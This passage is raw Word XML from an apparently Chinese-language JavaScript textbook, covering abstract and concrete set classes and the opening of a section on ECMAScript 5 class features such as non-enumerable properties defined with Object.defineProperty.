    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>equals:function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(that instanceof AbstractEnumerableSet))return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它们的大小不同，则它们不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.size()!=that.size())return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>检查每一个元素是否也在</w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){if(!that.contains(v))throw false;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的元素都匹配</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>集合相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}c</w:t>
      </w:r>
      <w:r>
        <w:t>atch(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(x===false)return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>集合不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw x;//</w:t>
      </w:r>
      <w:r>
        <w:t>发生了其他的异常：重新抛出异常</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*SingletonSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractEnumerableSet</w:t>
      </w:r>
      <w:r>
        <w:t>的非抽象子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*singleton</w:t>
      </w:r>
      <w:r>
        <w:t>集合是只读的，它只包含一个成员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var SingletonSet=AbstractEnumerableSet.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function SingletonSet(member){this.member=member;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>conta</w:t>
      </w:r>
      <w:r>
        <w:t>ins:function(x){return x===this.member;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>size:function(){return 1;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f,ctx){f.call(ctx,this.member);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>);/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*AbstractWritableSet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractEnumerableSet</w:t>
      </w:r>
      <w:r>
        <w:t>的抽象子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它定义了抽象方法</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>然后实现了非抽象方法</w:t>
      </w:r>
      <w:r>
        <w:t>union()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>intersection()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>difference()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>AbstractWritableSet=AbstractEnumerableSet.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(){throw new Error("Can't instantiate abstract classes");},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>add:abstractmethod,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>remove:abstractmethod,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>union:function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var self=this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>that.foreach(function(v){self.add(v);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>intersection:function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var self=this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){if(!that.contains(v))self.remove(v);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>difference:function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var self=this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>that.foreach(function(v){self.remove(v);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*ArraySet</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractWrita</w:t>
      </w:r>
      <w:r>
        <w:t>bleSet</w:t>
      </w:r>
      <w:r>
        <w:t>的非抽象子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它以数组的形式表示集合中的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>对于它的</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用了数组的线性查找</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的算法复杂度是</w:t>
      </w:r>
      <w:r>
        <w:t>O(n)</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>O(1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>它非常适用于相对小型的集合，注意，这里的实现用到了</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>的数组方法</w:t>
      </w:r>
      <w:r>
        <w:t>indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ArraySet=AbstractWritableSet.extend(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function ArraySet(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.values=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.add.apply(this,arguments);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>contains:function(v){return this.values.indexOf(v)!=-1;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>size:function(){return this.values.length;},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>foreach:function(f,c){this.values.forEach(f,c);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>add:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var arg=argum</w:t>
      </w:r>
      <w:r>
        <w:t>ents[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!this.contains(arg))this.values.push(arg);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>remove:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=this.values.indexOf(arguments[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(p==-1)continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.values.splice(p,1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;</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248" w:name="9_8_ECMAScript_5Zhong_De_Lei_"/>
      <w:r>
        <w:t>9.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="248"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>给属性特性增加了方法支持（</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>、可枚举性、可写性和可配置性），而且增加了对象可扩展性的限制。这些方法在</w:t>
      </w:r>
      <w:r>
        <w:t>6.6</w:t>
      </w:r>
      <w:r>
        <w:t>节、</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节都有详细的讨论，然而这些方法非常适合用于类的定义。下面几节讲述了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>的特性来使类更加健壮。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="249" w:name="9_8_1_Rang_Shu_Xing_Bu_Ke_Mei_Ju_"/>
      <w:r>
        <w:t>9.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　让属性不可枚举</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类使用了一个小技巧，将对象存储为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的成员：它给添加至这个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的任何对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>id”</w:t>
      </w:r>
      <w:r>
        <w:t>属性。之后如果在</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环中对这个对象做遍历，这个新添加的属</w:t>
      </w:r>
      <w:r>
        <w:t>性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r>
        <w:t>也会遍历到。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过设置属性为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>nonenumerable</w:t>
      </w:r>
      <w:r>
        <w:t>）来让属性不会遍历到。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-17</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何通过</w:t>
      </w:r>
      <w:r>
        <w:t>Objec</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>t.defineProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>来做到这一点，同时也展示了如何定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>函数以及检测对象是否是可扩展的（</w:t>
      </w:r>
      <w:r>
        <w:t>extensible</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-17</w:t>
      </w:r>
      <w:r>
        <w:t>：定义不可枚举的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将代码包装在一个匿名函数中，这样定义的变量就在这个函数作用域内</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个不可枚举的属性</w:t>
      </w:r>
      <w:r>
        <w:t>objectId</w:t>
      </w:r>
      <w:r>
        <w:t>，它可以被所有对象继承</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当读取这个属</w:t>
      </w:r>
      <w:r>
        <w:t>性时调用</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>，因此它是只读的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它是不可配置的，因此它是不能删除的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.defineProperty(Object.prototype,"objectId",{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get:idGetter,//</w:t>
      </w:r>
      <w:r>
        <w:t>取值器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>enumerable:false,//</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>configurable:false//</w:t>
      </w:r>
      <w:r>
        <w:t>不可删除的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>当读取</w:t>
      </w:r>
      <w:r>
        <w:t>objectId</w:t>
      </w:r>
      <w:r>
        <w:t>的时候直接调用这个</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function idGetter(){//getter</w:t>
      </w:r>
      <w:r>
        <w:t>函数返回该</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(idpr</w:t>
      </w:r>
      <w:r>
        <w:t>op in this)){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象中不存在</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!Object.isExtensible(this))//</w:t>
      </w:r>
      <w:r>
        <w:t>并且可以增加属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
